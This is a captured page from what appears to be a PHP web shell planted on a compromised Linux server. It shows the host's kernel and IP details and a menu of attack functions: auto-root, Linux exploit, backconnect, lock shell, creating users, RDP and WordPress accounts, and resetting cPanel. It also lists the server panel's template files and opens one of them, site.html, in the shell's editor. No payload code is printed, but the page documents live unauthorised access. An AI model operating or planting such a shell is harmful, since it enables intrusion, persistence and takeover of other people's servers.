Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.135.201.190
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
BTPanel /
templates /
default /
[ HOME SHELL ]
Name
Size
Permission
Action
autherr.html
14.66
KB
-rwxr-xr-x
close.html
329
B
-rwxr-xr-x
config.html
27.09
KB
-rwxr-xr-x
control.html
15.72
KB
-rwxr-xr-x
crontab.html
4.08
KB
-rwxr-xr-x
database.html
6.76
KB
-rwxr-xr-x
docker.html
14.83
KB
-rwxr-xr-x
down.html
128.08
KB
-rwxr-xr-x
error.html
152
B
-rwxr-xr-x
error2.html
6.13
KB
-rwxr-xr-x
error3.html
7.74
KB
-rwxr-xr-x
files.html
24.26
KB
-rwxr-xr-x
files_test.html
4.81
KB
-rwxr-xr-x
firewall.html
24.12
KB
-rwxr-xr-x
firewall_new.html
14.68
KB
-rwxr-xr-x
ftp.html
12.65
KB
-rwxr-xr-x
index.html
13.88
KB
-rwxr-xr-x
index_new.html
3.88
KB
-rwxr-xr-x
install.html
2.35
KB
-rwxr-xr-x
layout.html
36.73
KB
-rwxr-xr-x
license.html
19.63
KB
-rwxr-xr-x
login.html
74.73
KB
-rwxr-xr-x
logs.html
22.37
KB
-rwxr-xr-x
modify_password.html
2.74
KB
-rwxr-xr-x
movie.html
131
B
-rwxr-xr-x
panel_error.html
1.02
KB
-rwxr-xr-x
plugin_error.html
1.45
KB
-rwxr-xr-x
site.html
4.15
KB
-rwxr-xr-x
soft.html
3.57
KB
-rwxr-xr-x
tips.html
56.32
KB
-rwxr-xr-x
unsubscribe.html
7.73
KB
-rwxr-xr-x
xterm.html
6.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : site.html
{% extends "layout.html" %} {% block content %} <link rel="stylesheet" type="text/css" href="https://at.alicdn.com/t/font_1508259_3g6fa6pdt7k.css" /> <style> #webBody .webPath,#webBody .ssl_tips{ white-space: nowrap; display: inline-block; overflow: hidden; text-overflow: ellipsis; min-width: auto; } /* php分类选择器宽度 */ .site_class_type.bt_select_updown { width: 150px; } </style> <div class="main-content pb55"> <div class="container-fluid"> <!-- <div class="pos-box bgw mtb15"> <div class="position f14 c9 pull-left"> <a class="plr10 c4" href="/">{{data['lan']['H1']}}</a>/<span class="plr10 c4">{{data['lan']['H2']}}</span> </div> <div class="search pull-right" style="display: none;"> <form target="hid" onsubmit='site.get_list(1,$("#SearchValue").val())'> <input type="text" id="SearchValue" class="ser-text pull-left" placeholder="{{data['lan']['SEARCH']}}" /> <button type="button" class="ser-sub pull-left" onclick='site.get_list(1,$("#SearchValue").val())'></button> </form> <iframe name='hid' id="hid" style="display:none"></iframe> </div> </div> --> <div class="pos-box bgw mtb15"> <div class="tab-list" id="cutMode"> <div class="tabs-item active" data-type="php">PHP Project</div> <div class="tabs-item" data-type="nodejs">Node Project</div> </div> </div> <div id="site_table_view" class="site_table_view bgw mtb15 pd15"> <!-- <div class="info-title-tips"> <p><span class="glyphicon glyphicon-alert" style="color: #f39c12; margin-right: 10px;"></span> {{data['lan']['PS']}}after the site is successfully established, please<a class="btlink" href="/crontab">[Cron]</a>add scheduled backup tasks to the page!</p> </div> <div class="tab-nav" id="cutMode"> <span class="on">PHP Project</span> <span >Node Project</span> </div> --> <div class="tab-con" style="padding: 0;overflow: inherit;"> <div class="tab-con-block"> <div id="bt_site_table"></div> <div class="mask_layer hide"> <div class="prompt_description"></div> </div> </div> <div class="tab-con-block"> <div id="bt_node_table"></div> <div class="mask_layer hide"> <div class="prompt_description node-model"></div> </div> </div> </div> </div> </div> </div> {% endblock %} {% block scripts %} {{ super() }} <script type="text/javascript"> bt.set_cookie('sites_path', "{{session['config']['sites_path']}}"); bt.set_cookie('serverType', "{{session['webserver']}}"); var isSetup = "{{data['isSetup']}}" === 'True'?true:false // {% if not data['isSetup'] %} // layer.msg(lan.site.install_web_server_first+'<a href="/soft" style="color:#20a53a; float: right;">'+lan.site.to_install+'</a>', { icon: 7, shade: [0.3, '#000'], time: 0 }); // $(".layui-layer-shade").css("margin-left", "180px"); // {% else %} // //site.get_list(); // site.plugin_firewall(); // {% endif %} // function reverse(array){ // var reverse_array = []; // for(var i = array.length - 1; i >= 0 ; i-- ){ // reverse_array.push(array[i]); // } // return reverse_array // } </script> <script type="text/javascript" src="/static/laydate/laydate.js?date=20180301"></script> <script type="text/javascript" src="{{g.cdn_url}}/js/site.js?version={{g['version']}}&repair={{data['js_random']}}"></script> <script type="text/javascript" src="{{g.cdn_url}}/ace/ace.js?version={{g['version']}}" defer></script> <!-- 以下文件未来将被剔除 --> <script type="text/javascript" src="{{g.cdn_url}}/js/bootstrap-select.min.js" defer></script> <script type="text/javascript"> if(isSetup) site.plugin_firewall() </script> {% endblock %}
Close